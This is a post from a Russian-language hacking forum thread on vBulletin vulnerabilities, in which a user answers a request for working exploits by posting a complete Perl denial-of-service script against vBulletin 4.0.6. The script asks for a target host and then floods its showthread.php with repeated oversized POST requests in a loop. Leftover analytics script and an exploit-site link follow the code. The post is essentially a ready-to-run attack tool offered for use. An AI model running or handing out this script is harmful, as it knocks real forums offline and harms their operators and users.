Тема: [Обзор уязвимостей vBulletin]
Показать сообщение отдельно

  #114  
Старый 14.09.2011, 01:04
TYPUCT
Guest
Сообщений: n/a
Провел на форуме:
9412

Репутация: 0
По умолчанию
Цитата:
Сообщение от BLurpi^_^  
BLurpi^_^ said:
Для этого что то есть?
Ни это - http://www.exploit-db.com/exploits/17314/
Ни это - http://www.exploit-db.com/exploits/17555/
не работает
Проверка на работоспособность.

Код:
Code:
vBulletin 4.0.6 – Danial Of Service Exploit (redhat)====================================================
vBulletin 4.0.6 – Danial Of Service Exploit (redhat)
====================================================

################################################
Author : KnocKout
Thanks : DaiMon,BARCOD3
Contact : knockoutr@msn.com
Tested on : redhat
##############################################
##################vBulletin 4.0.6 – Danial Of Service Exploit for RedHat###############

#!/usr/bin/perl

use IO::Socket;

print "n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+n";
print "+ vBulletin 4.0.6 D.O.S Exploit(FOR redhat) +n";
print "+ Coded by KnocKout +n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+nn";
print "Host |without http://www.| ";
chomp($host = <STDIN>);
print "Path |example. /en or / | ";
chomp($pth = <STDIN>);
{
while($x != 999999)
{
$postit = "?t=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "nOffline! – We can not Connect To ‘$host’ it May be DoSedn" unless $sock;

print $sock "POST $pth/showthread.php HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $hostn";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postitn";
close($sock);
syswrite STDOUT, "Attack Started ";
$x++;
}
}

# Inj3ct0r.com [2010-09-02]var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}
http://inj3ct0r.com/exploits/13952
 
Ответить с цитированием